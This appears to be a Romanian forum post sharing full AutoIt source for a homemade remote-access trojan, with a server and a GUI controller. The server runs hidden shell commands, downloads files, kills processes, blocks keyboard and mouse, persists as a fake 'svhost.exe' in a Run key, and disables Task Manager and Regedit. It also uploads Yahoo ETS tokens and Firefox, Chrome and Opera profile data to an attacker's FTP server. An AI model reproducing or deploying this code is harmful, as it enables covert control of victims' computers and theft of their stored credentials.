parazitul29

[autoit] trojan example


un simplu trojan in autoit, facut la plictiseala

nu am testat toate functiile; l-am scris, l-am compilat si am testat cateva functii, care se comportau destul de bine. nu le-am testat decat pe cele de la stealere, dar cred ca merg bine

la stealere se trimite folderul din aplication data

functii

-internet explorer manipulation

-download file

-cmd control

-delete file

-message box

-run

-kill process

-delete file

-open/close cd

-blocheaza/deblocheaza tastatura si mouse

-click la anumite coordonate

-mouse wheel control

-upload file

-ets stealer

-mozzila,opera,chrome stealer //netestat fura parolel criptate se gasesc pe net programe pentru decriptarea lor

-disable/enable taskmanager,regedit

-server startup

screenshot

83376340.png

server

#include <IE.au3> 
#include <FTPEx.au3>
#Include <File.au3>

$g_IP = "127.0.0.1"
Break (0)




TCPStartUp()


$MainSocket = TCPListen($g_IP, 5555, 100 )
If $MainSocket = -1 Then Exit



while 1
$ConnectedSocket = TCPAccept( $MainSocket)
$recv = TCPRecv($ConnectedSocket, 2048)
$arr=StringSplit ( $recv, "|")
if $arr[1]="run" Then
ShellExecute($arr[2])
EndIf
if $arr[1]="procces" Then
ProcessClose ($arr[2])
EndIf
If $arr[1]="msgbox" Then
msgbox(0,"mesaj",$arr[2])
EndIf
If $arr[1]="delete" Then
$del=FileDelete ( $arr[2])
$socket = TCPConnect( $g_IP, 5555 )
$trim=TCPSend($socket,$del)

EndIf

if $arr[1]="mouseclick" Then
MouseClick("left",$arr[2],$arr[3])
EndIf
if $arr[1]="mousewhell" Then
MouseWheel($arr[2],$arr[3])
Endif
if $arr[1]="opencd" Then
CDTray ( $arr[2],$arr[3] )
EndIf

if $arr[1]="blocktast" Then
BlockInput (1)
EndIf
if $arr[1]="enabletast" Then
BlockInput(0)
EndIf
if $arr[1]="createieinv" Then
$oIE=_IECreate($arr[2],0,0,1,0)
EndIf
if $arr[1]="navie" Then
$noie=_IENavigate($oIE, $arr[2])
EndIf
if $arr[1]="manie" Then
$oForm = _IEFormGetObjByName ($oIE, $arr[2])
$oText = _IEFormElementGetObjByName ($oForm, $arr[3])
_IEFormElementSetValue ($oText, $arr[4])
_IEFormSubmit ($oForm)
EndIf
if $arr[1]="Console" Then
Run(@ComSpec & " /c " & $arr[2], "", @SW_HIDE)
EndIf

if $arr[1]="download" Then

Local $hDownload =InetGet($arr[2], $arr[3])
Do
Sleep(250)
Until InetGetInfo($hDownload, 2)
Local $nBytes = InetGetInfo($hDownload, 0)
InetClose($hDownload)

EndIf

if $arr[1]="Regdel" Then
RegDelete($arr[2])
EndIf
if $arr[1]="startup" Then
RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Server", "svhost.exe", "REG_SZ", "c:\windows\sistem32\svhost.exe")
filecopy(@ScriptFullPath,"c:\windows\sistem32\svhost.exe")
endif

if $arr[1]="taskmanager" Then
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","1")

EndIf
if $arr[1]="regeditdisable" then
regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
endif


if $arr[1]="taskenable" Then
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","0")
endif

if $arr[1]="regenable" Then
regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","0")
EndIf
if $arr[1]="ftpup" Then
$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$LocalFile=$arr[5]
$Remotefile=$arr[6]
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY")
$Ftpc = _FTP_Close($Open)
EndIf

if $arr[1]="ets" then

$grt=regread("HKEY_CURRENT_USER\Software\yahoo\pager","ETS")
_FileCreate("c:\windows\test.txt")
$file=FileOpen ( "c:\windows\test.txt",2)
If $file = -1 Then
MsgBox(0, "Error", "Unable to open file.")
Exit
EndIf
FileWrite($file, $grt)
$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$LocalFile="c:\windows\test.txt"
$Remotefile="/ets.txt"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY")
$Ftpc = _FTP_Close($Open)
EndIf

if $arr[1]="mozzila" Then


$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$Localfolder=@AppDataDir & "\Mozilla\Firefox\Profiles"

$Remotefolder="/mozzila"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)
$Ftpc = _FTP_Close($Open)

EndIf

if $arr[1]="chrome" Then

$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$Localfolder=@AppDataDir & "\Google\Chrome\User Data\Default"
$Remotefolder="/chrome"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)
$Ftpc = _FTP_Close($Open)
EndIf

if $arr[1]="opera" Then
$server = $arr[2]
$username = $arr[3]
$pass = $arr[4]
$Localfolder=@AppDataDir & "\Opera\Opera\profile"
$Remotefolder="/opera"
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)
$Ftpc = _FTP_Close($Open)
EndIf

wend

client

#include <GUIConstantsEx.au3>
#include<string.au3>
$g_IP = "127.0.0.1"
func internexp()
GUICreate("set")
$navigate=guictrlcreateinput("www.example.com/navigate",40, 80, 200, 20)
$create=guictrlcreateinput("wwww.example.com",40, 50, 200, 20)
$formname=guictrlcreateinput("form",40, 140, 100, 20)
$formelement=guictrlcreateinput("inputbox",150, 140, 100, 20)
$valori=guictrlcreateinput("exemplu exemplu",260, 140, 100, 20)

$create = GUICtrlCreateButton("lanseaza ie", 240,50, 150)
$nav = GUICtrlCreateButton("dute la",240, 80, 150)
$submit = GUICtrlCreateButton("trimite datele",120, 170, 150)
GUICtrlSetState(-1, $GUI_FOCUS)
gUICtrlSetState(-1, $GUI_FOCUS)
GUISetState()
Do


TCPStartUp()
$msg = GUIGetMsg()
if $msg=$create Then
$cre=GUICtrlRead($create)
$socket = TCPConnect( $g_IP, 5555 )
$crea=_StringInsert($cre,"createieinv|",0)
TCPSend($socket, $crea)
endif

if $msg=$nav Then
$nav=GUICtrlRead($navigate)
$socket = TCPConnect( $g_IP, 5555 )
$nave=_StringInsert($cre,"navie|",0)
TCPSend($socket, $nave)
EndIf

if $msg=$submit Then
$form2=GUICtrlRead($formname)
$formele=GUICtrlRead($formelement)
$form3=stringlen($form2)
$form4=_StringInsert($form2,$formele,$form3)
$form5=_StringInsert($form4,"|",$form2)
$form6=_Stringinsert($form5,"manie|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $form6)
EndIf

Until $msg = $GUI_EVENT_CLOSE


EndFunc


GUICreate("set",600,500)

$download=guictrlcreateinput("http//www.examplu.com/exemplu.exe",40, 0, 200, 20)
$downloc=guictrlcreateinput("c:\exemplu.exe",40, 25, 200, 20)
$console=guictrlcreateinput("console",40, 50, 200, 20)

$mesaji=guictrlcreateinput("mesaj",40, 80, 200, 20)
$ruleazai=guictrlcreateinput("notepad.exe",40, 110, 200, 20)
$killi=guictrlcreateinput("winamp.exe",40, 140, 200, 20)
$deletei=guictrlcreateinput("",40, 170, 200, 20)
$drivei=guictrlcreateinput("E:",40, 200, 40, 20)
$openi=guictrlcreateinput("open",90, 200, 30, 20)
$xcoori=guictrlcreateinput("500",40, 260, 30, 20)
$ycoori=guictrlcreateinput("500",90, 260, 30, 20)
$wheel1i=guictrlcreateinput("up",40, 320,30, 20)
$wheel2i=guictrlcreateinput("2",90, 320,30, 20)
$ftpupserv=guictrlcreateinput("ftp.server.com",350, 20, 200, 20)
$ftpupuser=guictrlcreateinput("user",350, 50, 200, 20)
$ftpuppass=guictrlcreateinput("parola",350, 80, 200, 20)
$ftplocal=guictrlcreateinput("c:\test.exe",350, 110, 200, 20)
$ftpservfile=guictrlcreateinput("/test.exe",350, 140, 200, 20)
$ftpetserv=guictrlcreateinput("ftp.server.com",410, 260, 150, 20)
$ftpetsus=guictrlcreateinput("utilizator",410, 290, 150, 20)
$ftpetspas=guictrlcreateinput("parola",410, 320, 150, 20)


$startup = GUICtrlCreateButton(" server startup", 360,440, 120)
$stealets = GUICtrlCreateButton("ets steal", 380,360, 50)
$mozzila = GUICtrlCreateButton("mozzila", 430,360, 50)
$chrome = GUICtrlCreateButton("chrome", 480,360, 50)
$opera = GUICtrlCreateButton("opera", 530,360, 50)
$upload = GUICtrlCreateButton("upload", 420,170, 50)
$cmd = GUICtrlCreateButton("cmd", 240,50, 50)
$down = GUICtrlCreateButton("download", 240,15, 70)
$mesaj = GUICtrlCreateButton("mesaj", 240,80, 50)
$ruleaza = GUICtrlCreateButton("ruleaza",240, 110, 50)
$kill = GUICtrlCreateButton("kill proces",240, 140, 90)
$delete = GUICtrlCreateButton("delete",240, 170, 60)

$drive = GUICtrlCreateButton("open/close drive",240, 200,100)
$bloctast = GUICtrlCreateButton("blocheaza tastatura",10, 230,200)
$debloc = GUICtrlCreateButton("deblocheaza taste",210, 230,200)
$click = GUICtrlCreateButton("click",210, 260,40)
$mouse = GUICtrlCreateButton("mouse wheel",210, 320,100)
$internet = GUICtrlCreateButton("browser ie",40, 350,200)
$distask = GUICtrlCreateButton(" taskmanager off",40, 400,140)
$entask = GUICtrlCreateButton(" taskmanager on",40, 440,140)
$disregedit = GUICtrlCreateButton(" regedit off",200, 400,140)
$enregedit = GUICtrlCreateButton("regedit on",200, 440,140)

$label1=GUICtrlCreateLabel("up/down", 40, 290)
$label2=GUICtrlCreateLabel("xcoord", 0, 265)
$label3=GUICtrlCreateLabel("ycoord", 125, 265)
$label4=GUICtrlCreateLabel("drive", 10, 200)
$label5=GUICtrlCreateLabel("open/closed", 130, 200)
GUICtrlSetState(-1, $GUI_FOCUS)
gUICtrlSetState(-1, $GUI_FOCUS)
GUISetState()
Do


TCPStartUp()
$msg = GUIGetMsg()
if $msg=$stealets Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "ets|"& $serv & "|" & $user & "|" & $pas)
EndIf

if $msg=$mozzila Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "mozzila|"& $serv & "|" & $user & "|" & $pas)
EndIf

if $msg=$opera Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "opera|"& $serv & "|" & $user & "|" & $pas)
EndIf
if $msg=$chrome Then
$serv=GUICtrlRead($ftpetserv)
$user=GUICtrlRead($ftpetsus)
$pas= guictrlread($ftpetspas)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "chrome|"& $serv & "|" & $user & "|" & $pas)
EndIf
if $msg=$upload Then
$servup=GUICtrlRead($ftpupserv)
$servupuser=GUICtrlRead($ftpupuser)
$servupass= GUICtrlRead($ftpuppass)
$uplocal=GUICtrlRead($ftplocal)
$upserv=GUICtrlRead($ftpservfile)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "ftpup|" & $servup & "|" & $servupuser & "|" & $servupass & "|" & $uplocal &"|" & $upserv )
endif
if $msg=$startup Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "startup|sss")
EndIf

if $msg=$distask Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "taskmanager|ss")
EndIf

if $msg=$entask Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "taskenable|ss")
EndIf

if $msg=$disregedit Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "regeditdisable|ss")
EndIf
if $msg=$enregedit Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "regenable|ss")
EndIf

If $msg=$down Then
$down1=GUICtrlRead($download)
$down2=GUICtrlRead($downloc)
$downlen=stringlen($down1)
$down3=_stringinsert($down1,$down2,$downlen)
$down4=_stringinsert($down3,"|",$downlen)
$down5=_stringinsert($down4,"download|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $down5)
endif
if $msg=$cmd Then
$cmdcontrol=guictrlread($console)
$cmd2=_stringinsert($cmdcontrol,"console|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $cmd2)
endif
if $msg=$mesaj Then
$mes=GUICtrlRead($mesaji)
$socket = TCPConnect( $g_IP, 5555 )
$mess=_StringInsert($mes,"msgbox|",0)
TCPSend($socket, $mess)
endif
if $msg=$ruleaza Then
$rul=GUICtrlRead($ruleazai)
$socket = TCPConnect( $g_IP, 5555 )
$rull=_StringInsert($rul,"run|",0)
TCPSend($socket, $rull)
endif
if $msg=$kill Then
$kil=GUICtrlRead($killi)

$kill=_StringInsert($kil,"procces|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $kill)
endif
if $msg=$delete Then
$del=GUICtrlRead($deletei)
$socket = TCPConnect( $g_IP, 5555 )
$dell=_StringInsert($del,"delete|",0)
TCPSend($socket, $dell)
endif
if $msg=$bloctast Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "blocktast|ssss")
EndIf
if $msg=$debloc Then
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, "enabletast|ssss")
endif
If $msg=$click Then
$coordx=GUICtrlRead($xcoori)
$coordy=GUICtrlRead($ycoori)
$coordlen=stringlen($coordx)
$coord=_stringinsert($coordx,$coordy,$coordlen)
$coord2=_stringinsert($coordx,"|",$coordlen)
$coord3=_stringinsert($coord2,"mouseclick|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $coord3)

endif
If $msg=$mouse Then
$wheel1m=GUICtrlRead($wheel1i)
$wheel2m=GUICtrlRead($wheel2i)
$wheellen=stringlen($wheel1m)
$wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen)
$wheel2=_stringinsert($wheel1,"|",$wheellen)
$wheel3=_stringinsert($wheel2,"mousewhell|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $wheel3)
endif
If $msg=$mouse Then
$wheel1m=GUICtrlRead($wheel1i)
$wheel2m=GUICtrlRead($wheel2i)
$wheellen=stringlen($wheel1m)
$wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen)
$wheel2=_stringinsert($wheel1,"|",$wheellen)
$wheel3=_stringinsert($wheel2,"mousewhell|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $wheel3)
endif
If $msg=$drive then
$drive1=GUICtrlRead($drivei)
$open1=GUICtrlRead($openi)
$drivelen=stringlen($drive1)
$cd=_stringinsert($drive1,$open1,$drivelen)
$cd2=_stringinsert($cd,"|",$drivelen)
$cd3=_stringinsert($cd2,"opencd|",0)
$socket = TCPConnect( $g_IP, 5555 )
TCPSend($socket, $cd3)
endif
if $msg=$internet Then
internexp()
endif
Until $msg = $GUI_EVENT_CLOSE
